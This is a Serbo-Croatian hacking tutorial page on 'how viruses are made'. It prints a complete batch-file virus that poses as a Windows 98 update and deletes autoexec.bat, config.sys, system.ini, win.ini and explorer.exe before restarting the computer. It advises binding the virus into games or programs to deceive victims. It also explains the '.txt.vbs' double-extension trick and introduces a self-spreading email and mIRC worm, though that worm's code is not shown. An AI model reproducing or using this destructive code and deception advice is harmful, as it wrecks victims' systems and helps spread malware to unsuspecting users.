Registracija
Upoznavanje.net vam pomaže da se povežete sa drugim ljudima iz vašeg života.

od
Kako se prave?]

Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savjetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++ i perl programske jezike.

U daljem tekstu sljede 2 primjera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumjeli morate znati BATCH i VISUAL BASIC skripting jezike.

Ukoliko bi vi zeljeli da napravite *.bat virus, evo vam malog primjera kako da to uradite. Potrebno je samo da sljedeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows 98, ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartirati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki exe fajl (program ili igricu), a to ce vam najlakse biti uz pomoc nekog bindera (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik... HeHeHe :D (da bi naucili ovaj programski potrazite turotial na NETu).

######### virus #########

@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:\autoexec.bat
echo y|del c:\config.sys
echo y|del c:\windows\system.ini
echo y|del c:\windows\win.ini
echo y|del c:\windows\explorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows

######### virus #########

VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom '.txt.vba', tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i pokrenu fajl. Posto je zadnja ekstenzija '.vba', ne pokreće se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva.

Sljedeci virus je hrvatska verzija virusa I_LOVE_YOU, samo sto je mnogo opasniji i mnogo bolji. Ovaj kod ce te takodjer iskopirati u notepad, ali snimicete ga kao volim_te.txt.vbs Virus je odlican, sam se kopira i salje putem e-maila ili preko mIRC-a.